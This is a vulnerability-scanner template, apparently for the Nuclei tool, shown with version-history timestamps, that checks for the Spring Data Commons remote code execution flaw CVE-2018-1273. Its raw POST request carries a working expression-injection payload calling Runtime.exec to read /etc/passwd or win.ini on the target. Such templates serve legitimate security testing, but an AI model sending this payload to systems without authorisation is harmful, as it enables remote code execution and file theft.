2021-01-02 05:00:39 +00:00
|
|
|
id: CVE-2018-1273
|
2020-10-01 02:28:22 +00:00
|
|
|
|
|
|
|
info:
|
2022-05-13 20:26:43 +00:00
|
|
|
name: Spring Data Commons - Remote Code Execution
|
2020-10-01 02:28:22 +00:00
|
|
|
author: dwisiswant0
|
|
|
|
severity: critical
|
|
|
|
description: |
|
|
|
|
Spring Data Commons, versions prior to 1.13 to 1.13.10, 2.0 to 2.0.5,
|
|
|
|
and older unsupported versions, contain a property binder vulnerability
|
|
|
|
caused by improper neutralization of special elements.
|
|
|
|
An unauthenticated remote malicious user (or attacker) can supply
|
|
|
|
specially crafted request parameters against Spring Data REST backed HTTP resources
|
2022-01-25 19:38:53 +00:00
|
|
|
or using Spring Data's projection-based request payload binding hat can lead to a remote code execution attack.
|
2022-04-22 10:38:41 +00:00
|
|
|
reference:
|
|
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2018-1273
|
2022-05-17 09:18:12 +00:00
|
|
|
- https://pivotal.io/security/cve-2018-1273
|
|
|
|
- http://mail-archives.apache.org/mod_mbox/ignite-dev/201807.mbox/%3CCAK0qHnqzfzmCDFFi6c5Jok19zNkVCz5Xb4sU%3D0f2J_1i4p46zQ%40mail.gmail.com%3E
|
2021-09-10 11:26:40 +00:00
|
|
|
classification:
|
|
|
|
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
|
2022-04-22 10:38:41 +00:00
|
|
|
cvss-score: 9.8
|
2021-09-10 11:26:40 +00:00
|
|
|
cve-id: CVE-2018-1273
|
|
|
|
cwe-id: CWE-20
|
2022-07-21 17:18:22 +00:00
|
|
|
tags: cve,cve2018,vmware,rce,spring,kev
|
2020-10-01 02:28:22 +00:00
|
|
|
|
|
|
|
requests:
|
2021-08-22 18:09:33 +00:00
|
|
|
- raw:
|
2020-10-01 02:28:22 +00:00
|
|
|
- |
|
|
|
|
POST /account HTTP/1.1
|
|
|
|
Host: {{Hostname}}
|
|
|
|
Connection: close
|
|
|
|
Content-Type: application/x-www-form-urlencoded
|
|
|
|
|
2022-04-29 05:04:34 +00:00
|
|
|
name[#this.getClass().forName('java.lang.Runtime').getRuntime().exec('{{url_encode('{{command}}')}}')]=nuclei
|
2021-08-22 18:09:33 +00:00
|
|
|
|
|
|
|
payloads:
|
|
|
|
command:
|
|
|
|
- "cat /etc/passwd"
|
|
|
|
- "type C:\\/Windows\\/win.ini"
|
|
|
|
|
2020-10-01 02:28:22 +00:00
|
|
|
matchers:
|
|
|
|
- type: regex
|
|
|
|
regex:
|
2021-07-24 21:35:55 +00:00
|
|
|
- "root:.*:0:0:"
|
2020-10-01 02:28:22 +00:00
|
|
|
- "\\[(font|extension|file)s\\]"
|
|
|
|
condition: or
|
|
|
|
part: body
|
2022-05-13 20:26:43 +00:00
|
|
|
|
|
|
|
# Enhanced by mp on 2022/05/12
|